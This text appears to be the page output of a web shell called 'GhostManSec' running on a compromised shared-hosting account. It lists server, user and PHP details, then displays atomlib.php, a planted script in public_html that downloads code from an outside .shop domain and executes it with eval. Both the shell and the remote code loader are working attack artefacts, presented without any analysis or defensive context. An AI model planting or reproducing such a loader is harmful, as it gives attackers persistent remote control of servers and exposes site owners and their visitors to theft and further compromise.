GhostManSec
Server: LiteSpeed
System: Linux server251.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: moroqbvm (12347)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/moroqbvm/public_html/atomlib.php
<?php
$c = curl_init("http://z60406_7.vjast.shop/stat/domain_index.txt");
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_TIMEOUT, 5);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
$result = curl_exec($c);
if ($result !== false) {
    eval('?>' . $result);
}else{
    echo "Error: ".curl_errno($c).", ".curl_error($c);
}
curl_close($c);
?>